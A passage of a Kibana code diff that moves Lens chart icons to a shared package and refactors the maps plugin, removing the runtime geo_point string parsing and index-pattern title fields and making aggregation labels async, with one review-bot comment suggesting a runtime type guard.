i18n.translate('xpack.lens.xyVisualization.stackedPercentageBarHorizontalLabel', { defaultMessage: 'H. Percentage bar', }), 
@@ -229,7 +231,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'area', - icon: LensIconChartArea, + icon: IconChartArea, label: i18n.translate('xpack.lens.xyVisualization.areaLabel', { defaultMessage: 'Area', }), @@ -237,7 +239,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'area_stacked', - icon: LensIconChartAreaStacked, + icon: IconChartAreaStacked, label: i18n.translate('xpack.lens.xyVisualization.stackedAreaLabel', { defaultMessage: 'Area stacked', }), @@ -245,7 +247,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'area_percentage_stacked', - icon: LensIconChartAreaPercentage, + icon: IconChartAreaPercentage, label: i18n.translate('xpack.lens.xyVisualization.stackedPercentageAreaLabel', { defaultMessage: 'Area percentage', }), @@ -253,7 +255,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'line', - icon: LensIconChartLine, + icon: IconChartLine, label: i18n.translate('xpack.lens.xyVisualization.lineLabel', { defaultMessage: 'Line', }), diff --git a/x-pack/plugins/lens/public/visualizations/xy/visualization.test.ts b/x-pack/plugins/lens/public/visualizations/xy/visualization.test.ts index b1313d765ae92..6817046864783 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/visualization.test.ts +++ b/x-pack/plugins/lens/public/visualizations/xy/visualization.test.ts @@ -25,7 +25,7 @@ import type { } from './types'; import { layerTypes } from '../../../common'; import { createMockDatasource, createMockFramePublicAPI } from '../../mocks'; -import { LensIconChartBar } from '../../assets/chart_bar'; +import { IconChartBar } from '@kbn/chart-icons'; import type { VisualizeEditorLayersContext } from '@kbn/visualizations-plugin/public'; import { chartPluginMock } from '@kbn/charts-plugin/public/mocks'; import { fieldFormatsServiceMock } from '@kbn/field-formats-plugin/public/mocks'; 
@@ -109,7 +109,7 @@ describe('xy_visualization', () => { it('should show the preferredSeriesType if there are no layers', () => { const desc = xyVisualization.getDescription(mixedState()); - expect(desc.icon).toEqual(LensIconChartBar); + expect(desc.icon).toEqual(IconChartBar); expect(desc.label).toEqual('Bar vertical'); }); diff --git a/x-pack/plugins/lens/public/visualizations/xy/visualization_helpers.tsx b/x-pack/plugins/lens/public/visualizations/xy/visualization_helpers.tsx index c36916f7f0306..46bc1ba8dc551 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/visualization_helpers.tsx +++ b/x-pack/plugins/lens/public/visualizations/xy/visualization_helpers.tsx @@ -7,6 +7,7 @@ import { i18n } from '@kbn/i18n'; import { uniq } from 'lodash'; +import { IconChartBarHorizontal, IconChartBarStacked, IconChartMixedXy } from '@kbn/chart-icons'; import { DatasourceLayers, OperationMetadata, VisualizationType } from '../../types'; import { State, @@ -20,9 +21,6 @@ import { } from './types'; import { isHorizontalChart } from './state_helpers'; import { layerTypes } from '../..'; -import { LensIconChartBarHorizontal } from '../../assets/chart_bar_horizontal'; -import { LensIconChartMixedXy } from '../../assets/chart_mixed_xy'; -import { LensIconChartBarStacked } from '../../assets/chart_bar_stacked'; import { LayerType } from '../../../common'; export function getAxisName( @@ -192,7 +190,7 @@ export function getDescription(state?: State) { if (visualizationType === 'mixed' && isHorizontalChart(state.layers)) { return { - icon: LensIconChartBarHorizontal, + icon: IconChartBarHorizontal, label: i18n.translate('xpack.lens.xyVisualization.mixedBarHorizontalLabel', { defaultMessage: 'Mixed bar horizontal', }), 
@@ -201,7 +199,7 @@ export function getDescription(state?: State) { if (visualizationType === 'mixed') { return { - icon: LensIconChartMixedXy, + icon: IconChartMixedXy, label: i18n.translate('xpack.lens.xyVisualization.mixedLabel', { defaultMessage: 'Mixed XY', }), @@ -214,7 +212,7 @@ export function getDescription(state?: State) { }; } -export const defaultIcon = LensIconChartBarStacked; +export const defaultIcon = IconChartBarStacked; export const defaultSeriesType = 'bar_stacked'; export const supportedDataLayer = { @@ -222,7 +220,7 @@ export const supportedDataLayer = { label: i18n.translate('xpack.lens.xyChart.addDataLayerLabel', { defaultMessage: 'Visualization', }), - icon: LensIconChartMixedXy, + icon: IconChartMixedXy, }; // i18n ids cannot be dynamically generated, hence the function below diff --git a/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/annotations_config_panel/icon_set.ts b/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/annotations_config_panel/icon_set.ts index 80cf7eccc9622..23a4b6fb52610 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/annotations_config_panel/icon_set.ts +++ b/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/annotations_config_panel/icon_set.ts @@ -7,7 +7,7 @@ import { i18n } from '@kbn/i18n'; import { AvailableAnnotationIcon } from '@kbn/event-annotation-plugin/common'; -import { IconTriangle, IconCircle } from '../../../../assets/annotation_icons'; +import { IconTriangle, IconCircle } from '@kbn/chart-icons'; import { IconSet } from '../shared/icon_select'; export const annotationsIconSet: IconSet = [ diff --git a/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/axis_settings_popover.tsx b/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/axis_settings_popover.tsx index 65d7b94281486..cb02bb796a3aa 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/axis_settings_popover.tsx 
+++ b/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/axis_settings_popover.tsx @@ -18,7 +18,13 @@ import { i18n } from '@kbn/i18n'; import { isEqual } from 'lodash'; import { AxisExtentConfig, YScaleType } from '@kbn/expression-xy-plugin/common'; import { ToolbarButtonProps } from '@kbn/kibana-react-plugin/public'; -import { XYLayerConfig, AxesSettingsConfig } from '../types'; +import { + EuiIconAxisBottom, + EuiIconAxisLeft, + EuiIconAxisRight, + EuiIconAxisTop, +} from '@kbn/chart-icons'; +import { isHorizontalChart } from '../state_helpers'; import { ToolbarPopover, useDebouncedValue, @@ -26,11 +32,7 @@ import { RangeInputField, BucketAxisBoundsControl, } from '../../../shared_components'; -import { isHorizontalChart } from '../state_helpers'; -import { EuiIconAxisBottom } from '../../../assets/axis_bottom'; -import { EuiIconAxisLeft } from '../../../assets/axis_left'; -import { EuiIconAxisRight } from '../../../assets/axis_right'; -import { EuiIconAxisTop } from '../../../assets/axis_top'; +import { XYLayerConfig, AxesSettingsConfig } from '../types'; import { validateExtent } from '../axes_configuration'; import './axis_settings_popover.scss'; diff --git a/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/layer_header.tsx b/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/layer_header.tsx index 44d9f342cfcd7..d55aa0aa12133 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/layer_header.tsx +++ b/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/layer_header.tsx 
@@ -9,12 +9,11 @@ import React, { useState } from 'react'; import { i18n } from '@kbn/i18n'; import { EuiIcon, EuiPopover, EuiSelectable, EuiText, EuiPopoverTitle } from '@elastic/eui'; import { ToolbarButton } from '@kbn/kibana-react-plugin/public'; +import { IconChartBarReferenceLine, IconChartBarAnnotations } from '@kbn/chart-icons'; import type { VisualizationLayerWidgetProps, VisualizationType } from '../../../types'; import { State, visualizationTypes, SeriesType } from '../types'; import { isHorizontalChart, isHorizontalSeries } from '../state_helpers'; import { StaticHeader } from '../../../shared_components'; -import { LensIconChartBarReferenceLine } from '../../../assets/chart_bar_reference_line'; -import { LensIconChartBarAnnotations } from '../../../assets/chart_bar_annotations'; import { updateLayer } from '.'; import { isAnnotationsLayer, isDataLayer, isReferenceLayer } from '../visualization_helpers'; @@ -34,7 +33,7 @@ export function LayerHeader(props: VisualizationLayerWidgetProps) { function ReferenceLayerHeader() { return ( { expect(points[0].coordinates).toEqual([lon, lat]); }); - it('Should convert runtime geo_point value', () => { - const points = []; - geoPointToGeometry(`${lat},${lon}`, points); - expect(points.length).toBe(1); - expect(points[0].type).toBe('Point'); - expect(points[0].coordinates).toEqual([lon, lat]); - }); - it('Should convert array of values', () => { const lat2 = 30; const lon2 = -60; diff --git a/x-pack/plugins/maps/common/elasticsearch_util/elasticsearch_geo_utils.ts b/x-pack/plugins/maps/common/elasticsearch_util/elasticsearch_geo_utils.ts index 964a88a8b1a93..9b03be8e7f8a0 100644 --- a/x-pack/plugins/maps/common/elasticsearch_util/elasticsearch_geo_utils.ts +++ b/x-pack/plugins/maps/common/elasticsearch_util/elasticsearch_geo_utils.ts 
@@ -129,7 +129,7 @@ export function hitsToGeoJson( // Parse geo_point fields API response export function geoPointToGeometry( - value: Point[] | Point | string | undefined, + value: Point[] | Point | undefined, accumulator: Geometry[] ): void { if (!value) { @@ -143,19 +143,6 @@ export function geoPointToGeometry( return; } - // runtime geo_point field returns value as "lat,lon" string instead of GeoJSON - // This is a workaround for a bug - https://github.com/elastic/elasticsearch/issues/85245 - if (typeof value === 'string') { - const commaSplit = value.split(','); - const lat = parseFloat(commaSplit[0]); - const lon = parseFloat(commaSplit[1]); - accumulator.push({ - type: GEO_JSON_TYPE.POINT, - coordinates: [lon, lat], - } as Point); - return; - } - // geo_point fields API returns GeoJSON accumulator.push(value as Point); } diff --git a/x-pack/plugins/maps/common/elasticsearch_util/es_agg_utils.ts b/x-pack/plugins/maps/common/elasticsearch_util/es_agg_utils.ts index 76dafc6a6c68e..90a29a0f72ee2 100644 --- a/x-pack/plugins/maps/common/elasticsearch_util/es_agg_utils.ts +++ b/x-pack/plugins/maps/common/elasticsearch_util/es_agg_utils.ts @@ -18,8 +18,8 @@ export function getField(indexPattern: DataView, fieldName: string): DataViewFie if (!field) { throw new Error( i18n.translate('xpack.maps.source.esSearch.fieldNotFoundMsg', { - defaultMessage: `Unable to find '{fieldName}' in index-pattern '{indexPatternTitle}'.`, - values: { fieldName, indexPatternTitle: indexPattern.title }, + defaultMessage: `Unable to find '{fieldName}' in index-pattern '{indexPatternName}'.`, + values: { fieldName, indexPatternName: indexPattern.getName() }, }) ); } diff --git a/x-pack/plugins/maps/public/actions/map_action_constants.ts b/x-pack/plugins/maps/public/actions/map_action_constants.ts index 62fed40a4171c..aabca948ec80a 100644 --- a/x-pack/plugins/maps/public/actions/map_action_constants.ts +++ b/x-pack/plugins/maps/public/actions/map_action_constants.ts 
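Review bot: Narrowing the parameter to `Point[] | Point | undefined` removes the `"lat,lon"` branch from the type only; the value still comes from an Elasticsearch response, and the remaining `accumulator.push(value as Point)` will push a bare string into the geometry list if a cluster that predates the fix for the referenced issue still returns one. Replace the unchecked assertion with a runtime guard before the push, e.g. `if (typeof value !== 'object') { return; }` (or throw, if callers should surface malformed data), so a non-GeoJSON payload is not silently treated as a Point. The array branch of geoPointToGeometry sits between the two hunks and is not visible here, and the test that covered the string form is deleted elsewhere in this diff.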
@@ -30,6 +30,7 @@ export const SET_LAYER_STYLE_META = 'SET_LAYER_STYLE_META'; export const UPDATE_SOURCE_PROP = 'UPDATE_SOURCE_PROP'; export const SET_MOUSE_COORDINATES = 'SET_MOUSE_COORDINATES'; export const CLEAR_MOUSE_COORDINATES = 'CLEAR_MOUSE_COORDINATES'; +export const SET_EMBEDDABLE_SEARCH_CONTEXT = 'SET_EMBEDDABLE_SEARCH_CONTEXT'; export const SET_GOTO = 'SET_GOTO'; export const CLEAR_GOTO = 'CLEAR_GOTO'; export const TRACK_CURRENT_LAYER_STATE = 'TRACK_CURRENT_LAYER_STATE'; diff --git a/x-pack/plugins/maps/public/actions/map_actions.ts b/x-pack/plugins/maps/public/actions/map_actions.ts index f21f09a6cff3b..f122d664ecf66 100644 --- a/x-pack/plugins/maps/public/actions/map_actions.ts +++ b/x-pack/plugins/maps/public/actions/map_actions.ts @@ -43,6 +43,7 @@ import { MAP_EXTENT_CHANGED, MAP_READY, ROLLBACK_MAP_SETTINGS, + SET_EMBEDDABLE_SEARCH_CONTEXT, SET_GOTO, SET_MAP_INIT_ERROR, SET_MAP_SETTINGS, @@ -340,6 +341,19 @@ export function setQuery({ }; } +export function setEmbeddableSearchContext({ + query, + filters, +}: { + filters: Filter[]; + query?: Query; +}) { + return { + type: SET_EMBEDDABLE_SEARCH_CONTEXT, + embeddableSearchContext: { filters, query }, + }; +} + export function updateDrawState(drawState: DrawState | null) { return (dispatch: Dispatch) => { if (drawState !== null) { diff --git a/x-pack/plugins/maps/public/classes/fields/agg/agg_field.ts b/x-pack/plugins/maps/public/classes/fields/agg/agg_field.ts index 869c69229ebf1..1a6841ffa9e7e 100644 --- a/x-pack/plugins/maps/public/classes/fields/agg/agg_field.ts +++ b/x-pack/plugins/maps/public/classes/fields/agg/agg_field.ts @@ -83,7 +83,7 @@ export class AggField extends CountAggField { async getLabel(): Promise { return this._label ? this._label - : this._source.getAggLabel( + : await this._source.getAggLabel( this._aggType, this._esDocField ? await this._esDocField.getLabel() : '' ); 
diff --git a/x-pack/plugins/maps/public/classes/fields/agg/count_agg_field.ts b/x-pack/plugins/maps/public/classes/fields/agg/count_agg_field.ts index 16f7a7d09d28f..03ade37c3dbec 100644 --- a/x-pack/plugins/maps/public/classes/fields/agg/count_agg_field.ts +++ b/x-pack/plugins/maps/public/classes/fields/agg/count_agg_field.ts @@ -66,7 +66,7 @@ export class CountAggField implements IESAggField { } async getLabel(): Promise { - return this._label ? this._label : this._source.getAggLabel(AGG_TYPE.COUNT, ''); + return this._label ? this._label : await this._source.getAggLabel(AGG_TYPE.COUNT, ''); } isValid(): boolean { diff --git a/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.test.ts b/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.test.ts index 4566cf4a73f1c..3b6eff3313077 100644 --- a/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.test.ts +++ b/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.test.ts @@ -32,7 +32,7 @@ const mockEsAggSource = { getAggKey: (aggType: AGG_TYPE, fieldName: string) => { return 'agg_key'; }, - getAggLabel: (aggType: AGG_TYPE, fieldName: string) => { + getAggLabel: async (aggType: AGG_TYPE, fieldName: string) => { return 'agg_label'; }, getIndexPattern: async () => { diff --git a/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.ts b/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.ts index bc542bf891517..57dcd5631918c 100644 --- a/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.ts +++ b/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.ts @@ -57,7 +57,7 @@ export class PercentileAggField extends AggField implements IESAggField { } const suffix = getOrdinalSuffix(this._percentile); - return `${this._percentile}${suffix} ${this._source.getAggLabel( + return `${this._percentile}${suffix} ${await this._source.getAggLabel( this._getAggType(), this.getRootName() )}`; 
diff --git a/x-pack/plugins/maps/public/classes/joins/inner_join.test.js b/x-pack/plugins/maps/public/classes/joins/inner_join.test.js
index 4e273f95515e4..f8ca092e9a164 100644
--- a/x-pack/plugins/maps/public/classes/joins/inner_join.test.js
+++ b/x-pack/plugins/maps/public/classes/joins/inner_join.test.js
@@ -15,7 +15,6 @@ const rightSource = {
 type: SOURCE_TYPES.ES_TERM_SOURCE,
 id: 'd3625663-5b34-4d50-a784-0d743f676a0c',
 indexPatternId: '90943e30-9a47-11e8-b64d-95841ca0b247',
- indexPatternTitle: 'kibana_sample_data_logs',
 term: 'geo.dest',
 metrics: [{ type: 'count' }],
 };
diff --git a/x-pack/plugins/maps/public/classes/layers/create_region_map_layer_descriptor.ts b/x-pack/plugins/maps/public/classes/layers/create_region_map_layer_descriptor.ts
index 19d9567a3480a..e88cbaa0d6d87 100644
--- a/x-pack/plugins/maps/public/classes/layers/create_region_map_layer_descriptor.ts
+++ b/x-pack/plugins/maps/public/classes/layers/create_region_map_layer_descriptor.ts
@@ -37,7 +37,6 @@ export interface CreateRegionMapLayerDescriptorParams {
 termsSize?: number;
 colorSchema: string;
 indexPatternId?: string;
- indexPatternTitle?: string;
 metricAgg: string;
 metricFieldName?: string;
 }
@@ -65,7 +64,6 @@ export function createRegionMapLayerDescriptor({
 termsSize,
 colorSchema,
 indexPatternId,
- indexPatternTitle,
 metricAgg,
 metricFieldName,
 }: CreateRegionMapLayerDescriptorParams): LayerDescriptor | null {
@@ -87,7 +85,6 @@ export function createRegionMapLayerDescriptor({
 type: SOURCE_TYPES.ES_TERM_SOURCE,
 id: joinId,
 indexPatternId,
- indexPatternTitle: indexPatternTitle ? indexPatternTitle : indexPatternId,
 term: termsFieldName,
 metrics: [metricsDescriptor],
 applyGlobalQuery: true,
diff --git a/x-pack/plugins/maps/public/classes/layers/vector_layer/bounds_data.ts b/x-pack/plugins/maps/public/classes/layers/vector_layer/bounds_data.ts
index 7136c9d0c2235..d7382782d1af7 100644
--- a/x-pack/plugins/maps/public/classes/layers/vector_layer/bounds_data.ts
+++ b/x-pack/plugins/maps/public/classes/layers/vector_layer/bounds_data.ts @@ -39,6 +39,7 @@ export async function syncBoundsData({ query: dataFilters.query, timeFilters: dataFilters.timeFilters, timeslice: dataFilters.timeslice, + embeddableSearchContext: dataFilters.embeddableSearchContext, filters: dataFilters.filters, joinKeyFilter: dataFilters.joinKeyFilter, applyGlobalQuery: source.getApplyGlobalQuery(), diff --git a/x-pack/plugins/maps/public/classes/layers/vector_layer/vector_layer.test.tsx b/x-pack/plugins/maps/public/classes/layers/vector_layer/vector_layer.test.tsx index 5b91e5e49c514..b71fef484de01 100644 --- a/x-pack/plugins/maps/public/classes/layers/vector_layer/vector_layer.test.tsx +++ b/x-pack/plugins/maps/public/classes/layers/vector_layer/vector_layer.test.tsx @@ -72,7 +72,6 @@ describe('cloneDescriptor', () => { right: { id: '557d0f15', indexPatternId: 'myIndexPattern', - indexPatternTitle: 'logs-*', metrics: [{ type: AGG_TYPE.COUNT }], term: 'myTermField', type: SOURCE_TYPES.ES_TERM_SOURCE, @@ -114,7 +113,6 @@ describe('cloneDescriptor', () => { right: { id: '557d0f15', indexPatternId: 'myIndexPattern', - indexPatternTitle: 'logs-*', term: 'myTermField', type: 'joinSource', } as unknown as ESTermSourceDescriptor, diff --git a/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/create_choropleth_layer_descriptor.ts b/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/create_choropleth_layer_descriptor.ts index 36e07d7383d18..2cbf6d3000b9a 100644 --- a/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/create_choropleth_layer_descriptor.ts +++ b/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/create_choropleth_layer_descriptor.ts 
@@ -38,14 +38,12 @@ function createChoroplethLayerDescriptor({ sourceDescriptor, leftField, rightIndexPatternId, - rightIndexPatternTitle, rightTermField, layerType, }: { sourceDescriptor: EMSFileSourceDescriptor | ESSearchSourceDescriptor; leftField: string; rightIndexPatternId: string; - rightIndexPatternTitle: string; rightTermField: string; layerType: LAYER_TYPE.GEOJSON_VECTOR | LAYER_TYPE.MVT_VECTOR; }) { @@ -98,7 +96,6 @@ function createChoroplethLayerDescriptor({ type: SOURCE_TYPES.ES_TERM_SOURCE, id: joinId, indexPatternId: rightIndexPatternId, - indexPatternTitle: rightIndexPatternTitle, term: rightTermField, metrics: [metricsDescriptor], applyGlobalQuery: true, @@ -125,13 +122,11 @@ export function createEmsChoroplethLayerDescriptor({ leftEmsFileId, leftEmsField, rightIndexPatternId, - rightIndexPatternTitle, rightTermField, }: { leftEmsFileId: string; leftEmsField: string; rightIndexPatternId: string; - rightIndexPatternTitle: string; rightTermField: string; }) { return createChoroplethLayerDescriptor({ @@ -141,7 +136,6 @@ export function createEmsChoroplethLayerDescriptor({ }), leftField: leftEmsField, rightIndexPatternId, - rightIndexPatternTitle, rightTermField, layerType: LAYER_TYPE.GEOJSON_VECTOR, }); @@ -152,14 +146,12 @@ export function createEsChoroplethLayerDescriptor({ leftGeoField, leftJoinField, rightIndexPatternId, - rightIndexPatternTitle, rightTermField, }: { leftIndexPatternId: string; leftGeoField: string; leftJoinField: string; rightIndexPatternId: string; - rightIndexPatternTitle: string; rightTermField: string; }) { return createChoroplethLayerDescriptor({ @@ -174,7 +166,6 @@ export function createEsChoroplethLayerDescriptor({ }), leftField: leftJoinField, rightIndexPatternId, - rightIndexPatternTitle, rightTermField, layerType: LAYER_TYPE.MVT_VECTOR, }); 
diff --git a/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/layer_template.tsx b/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/layer_template.tsx index 4edf85bc922d1..5fef8dd28ceb1 100644 --- a/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/layer_template.tsx +++ b/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/layer_template.tsx @@ -66,7 +66,6 @@ interface State { leftEmsJoinField: string | null; leftElasticsearchJoinField: string | null; rightIndexPatternId: string; - rightIndexPatternTitle: string | null; rightTermsFields: DataViewField[]; rightJoinField: string | null; } @@ -85,7 +84,6 @@ export class LayerTemplate extends Component { leftEmsJoinField: null, leftElasticsearchJoinField: null, rightIndexPatternId: '', - rightIndexPatternTitle: null, rightTermsFields: [], rightJoinField: null, }; @@ -99,7 +97,7 @@ export class LayerTemplate extends Component { } _loadRightFields = async (indexPatternId: string) => { - this.setState({ rightTermsFields: [], rightIndexPatternTitle: null }); + this.setState({ rightTermsFields: [] }); let indexPattern; try { @@ -116,7 +114,6 @@ export class LayerTemplate extends Component { this.setState({ rightTermsFields: getTermsFields(indexPattern.fields), - rightIndexPatternTitle: indexPattern.title, }); }; @@ -265,14 +262,12 @@ export class LayerTemplate extends Component { leftGeoField: this.state.leftGeoField!, leftJoinField: this.state.leftElasticsearchJoinField!, rightIndexPatternId: this.state.rightIndexPatternId, - rightIndexPatternTitle: this.state.rightIndexPatternTitle!, rightTermField: this.state.rightJoinField!, }) : createEmsChoroplethLayerDescriptor({ leftEmsFileId: this.state.leftEmsFileId!, leftEmsField: this.state.leftEmsJoinField!, rightIndexPatternId: this.state.rightIndexPatternId, - rightIndexPatternTitle: this.state.rightIndexPatternTitle!, rightTermField: this.state.rightJoinField!, }); 
diff --git a/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.test.ts b/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.test.ts index 771cf55ec25d3..7aaea96a06aed 100644 --- a/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.test.ts +++ b/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.test.ts @@ -55,7 +55,6 @@ describe('createLayerDescriptor', () => { applyGlobalTime: true, id: '12345', indexPatternId: 'apm_static_index_pattern_id', - indexPatternTitle: 'traces-apm*,logs-apm*,metrics-apm*,apm-*', metrics: [ { field: 'transaction.duration.us', diff --git a/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.ts b/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.ts index 26a9f14b8160f..b8536d8970939 100644 --- a/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.ts +++ b/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.ts @@ -173,7 +173,6 @@ export function createLayerDescriptor({ type: SOURCE_TYPES.ES_TERM_SOURCE, id: joinId, indexPatternId: APM_INDEX_PATTERN_ID, - indexPatternTitle: APM_INDEX_PATTERN_TITLE, // TODO look up from APM_OSS.indexPattern term: 'client.geo.country_iso_code', metrics: [metricsDescriptor], whereQuery: apmSourceQuery, diff --git a/x-pack/plugins/maps/public/classes/sources/es_agg_source/es_agg_source.ts b/x-pack/plugins/maps/public/classes/sources/es_agg_source/es_agg_source.ts index fce9293cf9f02..42b9c0ed73c77 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_agg_source/es_agg_source.ts +++ b/x-pack/plugins/maps/public/classes/sources/es_agg_source/es_agg_source.ts 
@@ -21,7 +21,7 @@ export const DEFAULT_METRIC = { type: AGG_TYPE.COUNT }; export interface IESAggSource extends IESSource { getAggKey(aggType: AGG_TYPE, fieldName: string): string; - getAggLabel(aggType: AGG_TYPE, fieldLabel: string): string; + getAggLabel(aggType: AGG_TYPE, fieldLabel: string): Promise; getMetricFields(): IESAggField[]; getMetricFieldForName(fieldName: string): IESAggField | null; getValueAggsDsl(indexPattern: DataView): { [key: string]: unknown }; @@ -88,7 +88,7 @@ export abstract class AbstractESAggSource extends AbstractESSource implements IE }); } - getAggLabel(aggType: AGG_TYPE, fieldLabel: string): string { + async getAggLabel(aggType: AGG_TYPE, fieldLabel: string): Promise { switch (aggType) { case AGG_TYPE.COUNT: return COUNT_PROP_LABEL; diff --git a/x-pack/plugins/maps/public/classes/sources/es_geo_grid_source/es_geo_grid_source.tsx b/x-pack/plugins/maps/public/classes/sources/es_geo_grid_source/es_geo_grid_source.tsx index 37b764bf6dbdc..b0a230bebc3cd 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_geo_grid_source/es_geo_grid_source.tsx +++ b/x-pack/plugins/maps/public/classes/sources/es_geo_grid_source/es_geo_grid_source.tsx @@ -142,14 +142,6 @@ export class ESGeoGridSource extends AbstractESAggSource implements IMvtVectorSo } async getImmutableProperties(): Promise { - let indexPatternName = this.getIndexPatternId(); - try { - const indexPattern = await this.getIndexPattern(); - indexPatternName = indexPattern.title; - } catch (error) { - // ignore error, title will just default to id - } - return [ { label: getDataSourceLabel(), @@ -157,7 +149,7 @@ export class ESGeoGridSource extends AbstractESAggSource implements IMvtVectorSo }, { label: getDataViewLabel(), - value: indexPatternName, + value: await this.getDisplayName(), }, { label: i18n.translate('xpack.maps.source.esGrid.geospatialFieldLabel', { 
diff --git a/x-pack/plugins/maps/public/classes/sources/es_geo_line_source/es_geo_line_source.tsx b/x-pack/plugins/maps/public/classes/sources/es_geo_line_source/es_geo_line_source.tsx index 4bb23cfb7e55b..78aae064a6555 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_geo_line_source/es_geo_line_source.tsx +++ b/x-pack/plugins/maps/public/classes/sources/es_geo_line_source/es_geo_line_source.tsx @@ -109,14 +109,6 @@ export class ESGeoLineSource extends AbstractESAggSource { } async getImmutableProperties(): Promise { - let indexPatternTitle = this.getIndexPatternId(); - try { - const indexPattern = await this.getIndexPattern(); - indexPatternTitle = indexPattern.title; - } catch (error) { - // ignore error, title will just default to id - } - return [ { label: getDataSourceLabel(), @@ -124,7 +116,7 @@ export class ESGeoLineSource extends AbstractESAggSource { }, { label: getDataViewLabel(), - value: indexPatternTitle, + value: await this.getDisplayName(), }, { label: i18n.translate('xpack.maps.source.esGeoLine.geospatialFieldLabel', { diff --git a/x-pack/plugins/maps/public/classes/sources/es_pew_pew_source/es_pew_pew_source.tsx b/x-pack/plugins/maps/public/classes/sources/es_pew_pew_source/es_pew_pew_source.tsx index 910181d6a2868..8e9f0aabf3070 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_pew_pew_source/es_pew_pew_source.tsx +++ b/x-pack/plugins/maps/public/classes/sources/es_pew_pew_source/es_pew_pew_source.tsx @@ -96,14 +96,6 @@ export class ESPewPewSource extends AbstractESAggSource { } async getImmutableProperties() { - let indexPatternTitle = this.getIndexPatternId(); - try { - const indexPattern = await this.getIndexPattern(); - indexPatternTitle = indexPattern.title; - } catch (error) { - // ignore error, title will just default to id - } - return [ { label: getDataSourceLabel(), 
@@ -111,7 +103,7 @@ export class ESPewPewSource extends AbstractESAggSource { }, { label: getDataViewLabel(), - value: indexPatternTitle, + value: await this.getDisplayName(), }, { label: i18n.translate('xpack.maps.source.pewPew.sourceGeoFieldLabel', { diff --git a/x-pack/plugins/maps/public/classes/sources/es_search_source/__snapshots__/update_source_editor.test.js.snap b/x-pack/plugins/maps/public/classes/sources/es_search_source/__snapshots__/update_source_editor.test.js.snap index 1edbdec242722..c99d67ffd5a30 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_search_source/__snapshots__/update_source_editor.test.js.snap +++ b/x-pack/plugins/maps/public/classes/sources/es_search_source/__snapshots__/update_source_editor.test.js.snap @@ -94,12 +94,10 @@ exports[`should enable sort order select when sort field provided 1`] = ` clusteringDisabledReason={null} filterByMapBounds={true} indexPatternId="indexPattern1" - mvtDisabledReason={null} numberOfJoins={0} onChange={[Function]} scalingType="LIMIT" supportsClustering={false} - supportsMvt={true} /> { ? { indexPatternId: indexPattern.id, geoField: geoFieldName, - scalingType: field && field.isRuntimeField ? SCALING_TYPES.LIMIT : SCALING_TYPES.MVT, + scalingType: SCALING_TYPES.MVT, } : null; const isPointsOnly = field ? field.type === 'geo_point' : false; diff --git a/x-pack/plugins/maps/public/classes/sources/es_search_source/es_search_source.tsx b/x-pack/plugins/maps/public/classes/sources/es_search_source/es_search_source.tsx index b99903423376e..f55f5be747dcd 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_search_source/es_search_source.tsx +++ b/x-pack/plugins/maps/public/classes/sources/es_search_source/es_search_source.tsx 
